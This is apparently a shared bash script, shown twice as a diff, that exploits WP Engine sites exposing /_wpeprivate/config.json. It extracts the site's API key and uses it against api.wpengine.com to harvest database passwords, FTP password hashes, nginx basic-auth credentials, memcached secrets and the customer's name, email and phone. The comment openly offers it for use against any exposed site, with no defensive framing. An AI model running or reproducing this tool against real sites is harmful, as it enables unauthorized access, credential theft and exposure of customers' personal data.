hateshape · June 19, 2024 13:30
diff --git a/wpeprivate-config.sh b/wpeprivate-config.sh
 #!/bin/bash
 # If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
 # If it "no worked" (Technical Term) then you probably need to install jq!

 TARGET=$1
 TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3)

 # Pretty Colors
 RESET='\033[00m'  
 GREEN='\033[01;32m'
 BLUE='\033[01;34m'

 echo -e ${BLUE}"------------------------ Downloading '_wpeprivate/config.json' -------------------------"${RESET}
 echo -e ${GREEN}"curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json"${RESET}
 curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json 

 WPEAPIKEY=$(jq '.' $TARGETDOMAIN-config.json | grep wpengine_apikey | awk '{print $2}' | cut -d, -f1 | sed 's/"//g')
 ACCOUNTNAME=$(jq '.' $TARGETDOMAIN-config.json | grep WPENGINE_ACCOUNT | awk '{print $2}' | cut -d, -f1 | sed 's/"//g' | sort -u)

 echo -e ${BLUE}"\n-------------------------- Make 1st API Call to api.wpengine.com -----------------------"${RESET}
 echo -e ${GREEN}"curl -so $ACCOUNTNAME-site.json -k https://api.wpengine.com/1.2/?method=site&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET}
 curl -so $ACCOUNTNAME-site.json -k "https://api.wpengine.com/1.2/?method=site&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY" 

 echo -e ${BLUE}"\n-------------------------- Make 2nd API Call to api.wpengine.com -----------------------"${RESET}
 echo -e ${GREEN}"curl -so $ACCOUNTNAME-customer.json -k https://api.wpengine.com/1.2/?method=customer-record&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET}
 curl -so $ACCOUNTNAME-customer.json -k "https://api.wpengine.com/1.2/?method=customer-record&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"

 echo -e ${BLUE}"\n----------------------------- Report - $(echo $TARGETDOMAIN) - $(echo $ACCOUNTNAME) -----------------------------"${RESET}
 echo -e ${BLUE}"Configuration Info - "${GREEN} >> $ACCOUNTNAME-report.txt
 grep -E '(site)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt
 grep -E '(server_name)|(wp_version)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt

 echo -e ${BLUE}"\nDomains - "${GREEN} >> $ACCOUNTNAME-report.txt
 jq -r '.all_domains' $ACCOUNTNAME-site.json | sed ':a;N;$!ba;s/\n//g' | sed 's|[{}"[]||g' | sed 's/  //g' | cut -d] -f1 >> $ACCOUNTNAME-report.txt
 echo -e ${BLUE}"\nDatabase Infos - "${GREEN} >> $ACCOUNTNAME-report.txt
 echo "db_password:"$(jq -r '.db_password' $ACCOUNTNAME-site.json) >> $ACCOUNTNAME-report.txt
 echo -e "db_password_encryption" >> $ACCOUNTNAME-report.txt
 jq -r '.db_password_encryption' $ACCOUNTNAME-site.json | sed -e $'s/,/\\\n/g' |  sed 's|[{}",]||g' >> $ACCOUNTNAME-report.txt

 echo -e ${BLUE}"\nFTP Users and Password Hashes - "${GREEN} >> $ACCOUNTNAME-report.txt
 jq '.ftp_users | to_entries[]' $ACCOUNTNAME-site.json | sed 's|[{},]||g' | awk '{print $1 $2}' | sed 's/"//g' | grep -vE '(value:)|(^$)' | sed 's/path:/&\n/g' >> $ACCOUNTNAME-report.txt

 echo -e ${BLUE}"Nginx  Auth - "${GREEN} >> $ACCOUNTNAME-report.txt
 jq -r '.nginx_basic_auth_staging' $ACCOUNTNAME-site.json | grep -E '(user)|(password)' | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt

 echo -e ${BLUE}"\nMiscellaneous - "${GREEN} >> $ACCOUNTNAME-report.txt
 grep -E '(gopher_enabled)|(memcached_secret)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g'|sed 's/,//' >> $ACCOUNTNAME-report.txt 

 echo -e ${BLUE}"\nUser Info - "${GREEN} >> $ACCOUNTNAME-report.txt
 echo "domain:"$(jq -r '.domain' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt 
 echo "account_id:"$(jq -r '.account_id' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt 
 echo "account_type:"$(jq -r '.account_type' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt 
 echo "full_name:"$(jq -r '.full_name' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
 echo "email:"$(jq -r '.email' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt 
 echo "phone:"$(jq -r '.phone' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt

 echo -e ${GREEN}
 cat $ACCOUNTNAME-report.txt
 echo -e ${BLUE}"----------------------------------------------------------------------------------------"${RESET}
	#!/bin/bash
	# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
	# If it "no worked" (Technical Term) then you probably need to install jq!

	TARGET=$1
	TARGETDOMAIN=$(echo $TARGET \| cut -d/ -f3)

	# Pretty Colors
	RESET='\033[00m'
	GREEN='\033[01;32m'
	BLUE='\033[01;34m'

	echo -e ${BLUE}"------------------------ Downloading '_wpeprivate/config.json' -------------------------"${RESET}
	echo -e ${GREEN}"curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json"${RESET}
	curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json

	WPEAPIKEY=$(jq '.' $TARGETDOMAIN-config.json \| grep wpengine_apikey \| awk '{print $2}' \| cut -d, -f1 \| sed 's/"//g')
	ACCOUNTNAME=$(jq '.' $TARGETDOMAIN-config.json \| grep WPENGINE_ACCOUNT \| awk '{print $2}' \| cut -d, -f1 \| sed 's/"//g' \| sort -u)

	echo -e ${BLUE}"\n-------------------------- Make 1st API Call to api.wpengine.com -----------------------"${RESET}
	echo -e ${GREEN}"curl -so $ACCOUNTNAME-site.json -k https://api.wpengine.com/1.2/?method=site&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET}
	curl -so $ACCOUNTNAME-site.json -k "https://api.wpengine.com/1.2/?method=site&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"

	echo -e ${BLUE}"\n-------------------------- Make 2nd API Call to api.wpengine.com -----------------------"${RESET}
	echo -e ${GREEN}"curl -so $ACCOUNTNAME-customer.json -k https://api.wpengine.com/1.2/?method=customer-record&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET}
	curl -so $ACCOUNTNAME-customer.json -k "https://api.wpengine.com/1.2/?method=customer-record&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"

	echo -e ${BLUE}"\n----------------------------- Report - $(echo $TARGETDOMAIN) - $(echo $ACCOUNTNAME) -----------------------------"${RESET}
	echo -e ${BLUE}"Configuration Info - "${GREEN} >> $ACCOUNTNAME-report.txt
	grep -E '(site)' $ACCOUNTNAME-site.json \| cut -d\" -f2-4 \| sed 's/"//g' >> $ACCOUNTNAME-report.txt
	grep -E '(server_name)\|(wp_version)' $ACCOUNTNAME-site.json \| cut -d\" -f2-4 \| sed 's/"//g' >> $ACCOUNTNAME-report.txt

	echo -e ${BLUE}"\nDomains - "${GREEN} >> $ACCOUNTNAME-report.txt
	jq -r '.all_domains' $ACCOUNTNAME-site.json \| sed ':a;N;$!ba;s/\n//g' \| sed 's\|[{}"[]\|\|g' \| sed 's/ //g' \| cut -d] -f1 >> $ACCOUNTNAME-report.txt
	echo -e ${BLUE}"\nDatabase Infos - "${GREEN} >> $ACCOUNTNAME-report.txt
	echo "db_password:"$(jq -r '.db_password' $ACCOUNTNAME-site.json) >> $ACCOUNTNAME-report.txt
	echo -e "db_password_encryption" >> $ACCOUNTNAME-report.txt
	jq -r '.db_password_encryption' $ACCOUNTNAME-site.json \| sed -e $'s/,/\\\n/g' \| sed 's\|[{}",]\|\|g' >> $ACCOUNTNAME-report.txt

	echo -e ${BLUE}"\nFTP Users and Password Hashes - "${GREEN} >> $ACCOUNTNAME-report.txt
	jq '.ftp_users \| to_entries[]' $ACCOUNTNAME-site.json \| sed 's\|[{},]\|\|g' \| awk '{print $1 $2}' \| sed 's/"//g' \| grep -vE '(value:)\|(^$)' \| sed 's/path:/&\n/g' >> $ACCOUNTNAME-report.txt

	echo -e ${BLUE}"Nginx Auth - "${GREEN} >> $ACCOUNTNAME-report.txt
	jq -r '.nginx_basic_auth_staging' $ACCOUNTNAME-site.json \| grep -E '(user)\|(password)' \| cut -d\" -f2-4 \| sed 's/"//g' >> $ACCOUNTNAME-report.txt

	echo -e ${BLUE}"\nMiscellaneous - "${GREEN} >> $ACCOUNTNAME-report.txt
	grep -E '(gopher_enabled)\|(memcached_secret)' $ACCOUNTNAME-site.json \| cut -d\" -f2-4 \| sed 's/"//g'\|sed 's/,//' >> $ACCOUNTNAME-report.txt

	echo -e ${BLUE}"\nUser Info - "${GREEN} >> $ACCOUNTNAME-report.txt
	echo "domain:"$(jq -r '.domain' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
	echo "account_id:"$(jq -r '.account_id' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
	echo "account_type:"$(jq -r '.account_type' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
	echo "full_name:"$(jq -r '.full_name' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
	echo "email:"$(jq -r '.email' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt
	echo "phone:"$(jq -r '.phone' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt

	echo -e ${GREEN}
	cat $ACCOUNTNAME-report.txt
	echo -e ${BLUE}"----------------------------------------------------------------------------------------"${RESET}